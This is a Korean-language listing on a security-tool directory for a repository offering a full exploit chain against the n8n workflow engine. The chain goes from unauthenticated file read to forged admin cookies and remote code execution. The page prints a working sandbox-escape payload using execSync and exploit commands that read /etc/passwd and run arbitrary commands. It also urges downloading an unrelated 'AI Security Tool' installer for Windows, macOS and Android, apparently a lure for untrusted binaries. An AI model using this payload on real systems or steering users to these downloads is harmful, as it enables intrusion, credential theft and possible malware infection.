Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" 인증되지 않은 임의 파일 읽기 및 표현식 주입 RCE 전체 체인)을 위한 공식 AI 보안 도구 모듈. | Kitploit
도구/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration TestingRed TeamingPayload Development
AI Security
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" 인증되지 않은 임의 파일 읽기 및 표현식 주입 RCE 전체 체인)을 위한 공식 AI 보안 도구 모듈.

저장소 보기
14시간 12분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ AI Security Tool 모듈
n8n 전체 체인 (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

AI Security Tool 생태계를 위한 공식 보안 감사 모듈


Latest Release Build Status Donations Telegram Channel

License

🌐 웹 데모 • 📚 프로젝트 웹사이트 • 💬 커뮤니티 채팅

웹사이트 내비게이션: 홈 • 업데이트 • 다운로드 • 모듈

AI Security Tool Banner


🧠 개념 개요

이 모듈은 Ni8mare라고 명명된 n8n 워크플로 자동화 인스턴스에 대한 진단 도구와 완전한 익스플로잇 체인을 제공합니다.

공격 체인은 Content-Type 혼동으로 인해 발생하는 인증되지 않은 임의 파일 읽기(CVE-2026-21858)와 인증된 표현식 주입 샌드박스 우회(CVE-2025-68613)를 결합합니다. 노출된 파일 업로드 폼에 조작된 Content-Type: application/json 요청을 전송함으로써, 공격자는 filepath 인수를 제어하여 내부 시스템 파일(/proc/self/environ, 구성 파일, SQLite DB)을 읽을 수 있습니다. 획득한 encryptionKey와 비밀번호 해시를 통해 관리자 JWT 쿠키를 오프라인에서 위조할 수 있습니다. 인증이 완료되면 this.process.mainModule.require를 통한 표현식 주입이 JavaScript 샌드박스를 탈출하여 임의의 시스템 명령을 실행합니다.

🎯 핵심 영향 철학

"파일 읽기에서 완전한 시스템 장악까지 세 단계."
파일 읽기는 바이너리 출력을 가진 활성 폼 워크플로가 필요하지만, 표현식 주입은 특별한 노드나 명시적인 시스템 권한 활성화 없이 기본 n8n 설치에서 안정적으로 작동합니다.

📊 취약점 사양

사양할당된 값비고
CVE 식별자CVE-2026-21858 + CVE-2025-68613전체 체인: 인증되지 않은 파일 읽기에서 RCE까지
심각도 등급치명적 (CVSS v3.1: 10.0 + 9.9)인증되지 않은 RCE 체인
취약점 유형CWE-200 / CWE-94Content-Type 혼동 / 코드 주입
영향받는 구성 요소n8n 워크플로 자동화 엔진버전 <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
패치된 버전1.121.0 (AFR) / 1.120.4+ (RCE)공식 벤더 패치 출시됨
필요 권한없음공개 폼을 통한 인증되지 않은 초기 접근

🕸 공격 시나리오 및 아키텍처

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 표현식 주입 페이로드

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 완화 체크리스트

  • 🟢 즉시 업그레이드: n8n 인스턴스를 버전 1.121.0 이상으로 업데이트하십시오.
  • 🟢 워크플로 트리거 제한: 공개 인증되지 않은 폼 워크플로를 비활성화하거나 엄격한 파일 검증을 적용하십시오.
  • 🟡 실행 제한 구성: N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true를 설정하고 Docker 컨테이너의 프로세스 권한을 제한하십시오.

💻 이 모듈을 실행하는 방법

⚠️ 중요: 이 모듈은 AI Security Tool 생태계 내에서 안전한 실행과 진단을 위해 특별히 제작되었습니다. 항상 공식 저장소에서 제공되는 검증된 모듈을 사용하십시오.

1️⃣ AI Security Tool 설치

모니터링 및 진단 스크립트를 실행하려면 AI Security Tool 코어 엔진이 설치되어 있는지 확인하십시오:

OS / 플랫폼버전아키텍처 / 형식출시일상태다운로드 링크
🪟 Windowsv6.3.20x64 설치 프로그램 (.exe)2026-09-08🟢 최신.exe 다운로드
🪟 Windowsv6.3.20x64 포터블 (.tar.gz)2026-09-08🟢 최신.tar.gz 다운로드
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 안정.dmg 다운로드
🐧 Linuxv5.3.27범용 x64 (.tar.gz)2026-09-01🟢 안정.tar.gz 다운로드
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 안정.apk 다운로드

2️⃣ 콘솔 실행

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 보안 감사 모듈 및 PoC 저장소

커뮤니티에서 유지 관리하는 취약점 스캐너 모듈, PoC 스크립트 및 연구 저장소:

🔥 원격 코드 실행 (RCE) 및 네트워크 취약점 5 modules
  • CVE-2026-21858 — n8n 전체 체인 인증되지 않은 RCE (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Netlogon 원격 코드 실행 익스플로잇 @ZeroDayEvil
  • CVE-2026-20805 — Windows 원격 코드 실행 개념 증명 @ZeroDayEvil
  • CVE-2026-41096 — 치명적 RCE 취약점 스캐너 모듈 @ZeroDayEvil
  • CVE-2026-24291 — 네트워크 프로토콜 원격 코드 실행 @ZeroDayVPN
🛡️ 권한 상승 (EoP) 및 서비스 3 modules
  • CVE-2026-54121 — AD CS Certighost 도메인 컨트롤러 가장 @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice 서비스 권한 상승 @ZeroDayVPN
  • CVE-2026-50416 — 로컬 권한 상승 분석 및 PoC @ZeroDayEvil
📚 취약점 연구 및 분석 2 modules
  • CVE-2026-42978 — 심층 기술 분석 및 PoC 연구 @ZeroDayEvil
  • CVE-2026-83991 — 전체 분석 및 익스플로잇 시연 @ZeroDayVPN

⚖️ 라이선스 및 법적 고지

🚨 고지

이 도구와 기술 분석은 승인된 시스템 감사, 연구 및 침투 테스트를 위해서만 제공됩니다.
승인되지 않은 대상에 대한 익스플로잇 체인 실행은 불법입니다. 저자는 무단 접근, 데이터 손실 또는 시스템 중단에 대해 어떠한 책임도 지지 않습니다. 승인된 범위 내에서만 작업하십시오.

🔄 기여 및 커뮤니티

보안 연구 커뮤니티의 기여를 환영합니다! 주요 기여 분야:

  1. AI 통합: 새로운 LLM 제공자 추가 및 특화된 보안 에이전트 개발.
  2. 보안 도구: 취약점 모듈 개발 및 CLI 스캐너 통합.
  3. 최적화: 파서 속도, 실행 안전성 및 캐싱 로직 향상.
  4. 문서화: 연구 논문, 가이드 및 현지화 번역 작성.

🔗 연락처 및 지원

  • 공식 웹사이트: ZeroDayEvil.com
  • 원본 연구: Cyera Ni8mare 분석
  • Telegram 관리자: @ZeroDayEvil
  • Telegram 채팅: @ZeroDyaTool_chat
  • Telegram 채널: @ZeroDyaTool_channel
  • 프로젝트 후원: PayPal 기부
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — 사이버 보안 전문가를 위한 터미널 워크플로와 자동화를 재구상합니다.

도구 다운로드